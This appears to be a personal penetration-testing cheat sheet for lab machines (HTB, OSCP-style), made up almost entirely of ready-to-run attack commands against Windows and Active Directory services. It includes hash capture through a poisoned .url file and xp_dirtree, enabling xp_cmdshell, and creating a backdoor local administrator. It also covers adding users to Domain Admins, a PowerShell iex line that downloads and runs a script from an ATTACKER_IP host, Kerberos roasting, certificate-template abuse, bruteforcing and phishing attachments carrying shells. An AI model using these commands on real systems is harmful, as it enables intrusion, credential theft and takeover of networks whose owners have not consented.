REVERT AFTER INITIAL ENUMERATION
IF PHP SHELL REQUIRED USE PHP Ivan Sincek from revshells
Sometimes if the payload is not working try:
Copy sudo ifconfig tun0 mtu 1250
Copy python3 -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
Windows Privesc Checklist
If windows then just use rdesktop to connect without credentials and check version
To check if Powershell or CMD:
Copy (dir 2>&1 *`| echo CMD); & <# rem #> echo PowerShell
Enumeration
Rustscan:
Copy rustscan -a 192.168.234.62 --accessible --ulimit 5000 -- -sC -sV
Check default passwords and try to bruteforce with the respective worldlists from seclists.
Check for http websites on unusual ports
If upload present try ntlm-theft
If website files are accessible by htdocs,etc then try to upload shell.php by symlink or directly.
If .NET use iLspy or dnspy or dotpeek
If zip file use evilarc for path traversal
Netexec
Password policy: nxc smb 10.10.10.161 --pass-pol -u '' -p ''
To enumerate users: nxc smb 172.16.5.5 --users
Groups enumeration: --groups
Copy nxc winrm <ip> -u user-can-read-laps -p pass --laps
Add name at end if administrator is a different user
Copy nxc ldap <ip> -u user -p pass --bloodhound -c All -ns <ip>
Copy nxc smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
Copy nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
To check credentials in gpp:
Copy nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
Copy nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
or with wordlist :
Copy nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
To check if computers can be added
Copy nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq
Run commands on behalf of other users:
Copy nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
Quickly add user to domain admin:
Copy powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"
Copy nxc smb <ip> -u user -p pass -M security-questions
HTTP
Try cadaver and try to upload shell
Try bruteforce with burp before hydra.
SNMP (UDP 161)
Copy snmpwalk -c public -v1 -t 10 192.168.50.151
Add one of these at the end in snmpwalk
1.3.6.1.2.1.25.1.6.0 System Processes
Then try:
Copy snmpwalk -v2c -c public $IP NET-SNMP-EXTEND-MIB::nsExtendOutputFull
-v
- 1 ,2c ,3
To bruteforce community strings:
Copy hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 10.10.255.200 snmp
Then can use snmp-check to get more info:
Copy snmp-check -c 'community-string-here' <ip>
For brute-forcing ip:
Copy echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.215.$ip; done > ips
onesixtyone -c community -i ips
tftp
To bruteforce files in tftp:
Copy sudo nmap -Pn -sU -p69 --script tftp-enum 192.168.209.149
ICMP
Can ping whole subnet fping -asgq 172.16.5.0/23
SMTP
To send an email with smtp server:
Copy sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com --attach @config.Library-ms --server 192.168.167.199 -body @body.txt -header "Subject:Problems" -ap
Add -ap
for authentication
Or:
Copy sendemail -f 'jonas@localhost' \
-t 'mailadmin@localhost' \
-s 192.168.219.140:25 \
-u 'a spreadsheet' \
-m 'Please check this spreadsheet' \
-a shell.ods
DNS
To dump all dns: adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
to resolve unknown records use -r
Copy dig @10.10.11.174 +short support.htb any
Zone transfer info to find other domains:
Copy dig @<ip> axfr flight.htb
Use host or dnsrecon command and use -t to select dns record type host -t mx megacorpone.com
dnsrecon -d megacorpone.com -t std
SMB(139,445)
Check for anonymous access:
For anonymous cme smb 10.10.11.202 -u 'anon' -p '' --shares
Copy sudo nmap --script smb-vuln* <IP>
If hashes are acquired from mssql or smb then try SMB Relaying if message signing disabled. Check with
Copy nxc smb 10.10.143.69-71 ( ip range ) --gen-relay-list relay.txt
Check for interesting scripts in SYSVOL: ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
and might find passwords in .vbs files
Copy nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
Copy sudo mount -t cifs -o 'user=username,password=pass' //<ip>/share /mnt/share
If the share looks like it is being accessed try to capture NTLMv2 hashes by using evil url and responder(analysis mode):
Copy [InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.8.1.208\%USERNAME%.icon
IconIndex=1
For OS discovery nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152
For older windows version: sudo nmap --script smb-vuln* 192.168.180.40
If a shared share is discovered try multiple poisoned files. Easiest is ntlmtheft.
FTP(21)
Check for ftp anonyomous access:
To bruteforce use medusa medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
Default location is /var/ftp
quote PASV
to fix ftp or use passive
Copy nxc ftp 192.168.0.10 -u 'marshall' -p 'badpassword' --ls
Copy netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --put [LOCAL_FILE] [REMOTE_FILE]
Copy netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --get [FILE]
Postgres
Try authentication with admin:admin or postgres:postgres and such variations
Copy psql -U postgres -W -h 192.168.212.47 -p 5437
To get list of databases:
Now check for exploits and use searchsploit -m multiple/remote/50847.py
if version from 9.3 to 11.7
MSSQL
Copy SELECT name FROM master.dbo.sysdatabases
Check tables in database:
Copy SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
Check as what user the db is running:
Copy exec xp_dirtree "\\10.8.1.208\share"
Catch with responder or smbserver
To get an interactive mssql shell: mssqlclient.py user:pass@sequel.htb
If password present try /
Copy EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;
or
Copy EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;--
Copy SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Refer PG Practice- hokkaido
To audit: Invoke-SQLAudit -Verbose
from PowerUpSQL
look for privesc cheatsheat in powerupsql github
RPC
enumerate rpcclient -U '' -N <ip>
then try enumdomusers
,querydispinfo
,etc.
Copy rpcclient -U "" <ip> -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep "0x" -v | tr -d '[]' > userlist.txt
User info can be changed with setuserinfo
. To change oassword:
Copy setuserinfo christopher.lewis 23 'Admin!23'
RDP
Copy xfreerdp /u:offsec /p:lab /v:192.168.183.250 /cert-ignore /compression /auto-reconnect /drive:/tmp,tmp +clipboard
If any black screen problems:
Copy sudo ifconfig tun0 mtu 1250
If administrator get RDP by using Enable_RDP.ps1 script:
Copy Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
$username = "hackmin"
$password = ConvertTo-SecureString "Password123$" -AsPlainText -Force
New-LocalUser -Name "$username" -Password $password -FullName "$username" -Description "hackmin"
Add-LocalGroupMember -Group "Administrators" -Member "$username"
Copy iex ((New-Object System.Net.WebClient).DownloadString('http://${ATTACKER_IP}:${ATTACKER_PORT}/Enable_RDP.ps1'))
Ldap
Netexec ldap more to less info order:
Copy nxc ldap 192.168.235.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192' --query "(objectClass=*)" "*"
Copy nxc ldap 192.168.235.122 -u '' -p '' --query "(sAMAccountName=*)" "*"
Copy nxc ldap <ip> -u username -p password --query "(sAMAccountName=Administrator)" ""
Change the name here
Copy nxc ldap <ip> -u username -p password --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet"
To get descriptions for users:
Copy nxc ldap 192.168.235.122 -u '' -p '' -M get-desc-users
ldapnomnom for bruteforcing usernames fast asf. Check for usernames with
Copy ldapnomnom --input 10m_usernames.txt --output multiservers.txt --dnsdomain contoso.local --maxservers 32 --parallel 16
Copy ldapnomnom --input 10m_usernames.txt --output results.txt --server 192.168.0.11 --parallel 4
Extract rootDSE attributes:
Copy ldapnomnom --output rootDSEs.json --dump
Using nmap to enumerate ldap
Copy nmap -sV --script "ldap* and not brute" <IP>`
Check ldap using ldapsearch: ldapsearch -x -H ldap://<ip>
Get FQDN :ldapsearch -x -H ldap://<ip> -s base namingcontexts
Copy ldapsearch -x -H ldap://192.168.218.122 -s base namingcontexts
Get everything to grep for:
Copy ldapsearch -x -H ldap://192.168.192.122 -D '' -w '' -b "DC=hutch,DC=offsec" > ldap-search
Copy ldapsearch -H ldap://<ip> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"
Analysing:
Copy cat ldap.txt | awl '{print $1}' | sort | uniq -c| sort -n | grep ':'
Print first word then sort then print unique and then show non repeating.grep ':'
removes the base64 stuff.
To enumerate users over ldap (ldap can be finicky revert):
Copy ldapsearch -H ldap://<ip> -x -b "DC=absolute,DC=htb" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Optionally use authentication with -U
and -w
for username and password
Copy ldapsearch -x -H ldap://192.168.192.122 -D '' -w '' -b "DC=hutch,DC=offsec"
Copy ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
To enumerate various things use windapsearch.py
Copy python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da
use -PU for potential users with elevated privileges that might have gone unnoticed
To check for domain admins
Copy python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da
TO check for privileged users
Copy python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU
Miscellaneous
Use lazagne to search for stored credentials in web browsers,applications,etc.
If Groupds.xml found use gpp-decrypt
Active Directory
If linux and sudo user check: /etc/krb5.keytab
Try kerberoasting if you have credentials or a shell on the target machine
Linux
GetUserSPNs.py -dc-ip dc01.hybrid.vl hybrid.vl/peter.turner
Use kerbrute to bruteforce usernames and asreproast
Copy kerbrute userenum --dc dc.absolute.htb -d absolute.htb username.txt
For etype 23 hash: --downgrade
For bruteforce: /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
bruteforce from https://github.com/insidetrust/statistically-likely-usernames
To get Ticket Granting Ticket:getTGT.py absolute.htb/d.klay
Copy KRB5CCNAME=d.klay.ccache ./bloodhound.py -k -dc dc.absolute.htb -ns 10.10.11.181 -c All -d absolute.htb -u d.klay@absolute.htb
Hunting for Users with Kerberoast Pre-auth Not Required:
Copy GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users
Windows
To enumerate for asreproastable users (PowerView):
Copy Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Rubeus method: .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
Certificate Authority(CA)
nxc ldap sendai.vl -u Elliot.Yates -p 'aditya123@' -M adcs
To check for vulnerable certificates sudo certipy-ad find -u 'a.briggs' -p 'password' -dc-ip <ip> -stdout -vulnerable
To get in bloodhound: -old-bloodhound
Esc1
Copy certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn 'administrator@hybrid.vl' -dc-ip 10.10.208.21 -key-size 4096 -debug
Copy certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.208.21
Esc4
Convert to ESC1 and follow ESC1 procedure:
Copy certipy template -username 'clifford.davey'@sendai.vl -password RFmoB2WplgE_3p -template SendaiComputer -save-old
Check nmap for certificate authority
Refer Absolute-HTB for more details
DNS Records
Copy addcomputer.py -dc-ip 10.10.67.128 -computer-pass EvilYeeb123 -computer-name evilyeeb sendai.vl/Susan.Harper:'Password123'
Copy dnstool.py -u 'sendai.vl\evilyeeb$' -p 'EvilYeeb123' -r evilyeeb.sendai.vl -d 10.8.0.193 --action add DC.sendai.vl -dns-ip 10.10.67.128
Bloodhound
If SID is displayed it is a local account . BloodHound uses this representation of a principal when the domain identifier of the SID is from a local machine
Use Collection Loops to not miss information.
Copy bloodhound.py -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all --zip
can also use -dns-tcp
Manual commands : Format for cypher:
Copy (NODES)-[:RELATIONSHIP]->(NODES)
All computers in domain:
Copy MATCH (m:Computer) RETURN m
All Users in domain:
Copy MATCH (m:User) RETURN m
To get active sessions:
Copy MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
Copy dnschef --fakeip 10.10.225.134
Copy bloodhound.py -u 'rsmith' -p 'IHateEric2' -d lab.trusted.vl -dc labdc.lab.trusted.vl -c all -ns 127.0.0.1
If we have shell access on the target
Copy SharpHound.exe -c All
--Loop --LoopDuration 00:10:00
to loop
Copy cat 20240302180235_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r
If object-id of a group is above 1000 it is non default
Bloodhound doesn't collect Info so check that with ldapsearch
Raw query to enumerate users with SQLAdmin: MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
Raw query to enumerate users with CanPSRemote: MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
Security and Obfuscation
Powershell command for windows defender Get-MpComputerStatus
There are multiple locations for powershell if blocked: %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
To check whitelist apps: Get-AppLockerPolicy
To find the users who can read Local Administrator Password Solution (LAPS) passwordsFind-LAPSDelegatedGroups
To check if LAPS enabled or cleartext passwords sometimes Get-LAPSComputers
Impacket
GetNPUsers - This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' for asrep roasting.
GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat
GetUserSPN - For kerberoasting as it Queries target domain for SPNs that are running under a user account
List SPN accountsGetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
add -request
to get in hashcat format or -request-user
to get only for the user
ACL(Access Control List)
PowerView
Suppose we have a single user and want to enumerate ACL from there. In these examples the user is wley
Copy Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley
Now to get ACL:
Copy Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Without PowerView
Copy Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
Now getting the data with Get-ACL:
Copy foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
Here we have access over damundsen
Then to convert the GUID use:
Copy $guid= "00299570-246d-11d0-a768-00aa006e0529"
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
To further enumerate damundsen
Copy $sid2 = Convert-NameToSid damundsen
PS C:\htb> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
Access over HelpDesk
Copy Get-DomainGroup -Identity "Help Desk Level 1" | select memberof
To get passwords in descriptions:
Copy Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}
Checking for PASSWD_NOTREQD Setting
Copy Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
Checking for pre auth kerberos not required
Copy Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Enumerating GPO names:
PowerShell:Get-DomainGPO |select displayname
Built-in:Get-GPO -All | Select DisplayName
Copy $sid=Convert-NameToSid "Domain Users"
PS C:\htb> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
To abuse GPO misconfiguration: SharpGPOAbuse
PFX
Copy openssl pkcs12 -in file.pfx -info
If pfx file is encountered and it is password protected use pfx2john
To extract certificate and key:
Copy openssl pkcs12 -in file.pfx -nocerts -out key.pem -nodes
Copy openssl pkcs12 -in file.pfx -nokeys -out key.cert
We can use winrm to login using keys.
Copy evil-winrm -S -i <ip> -c key.cert -k key.pem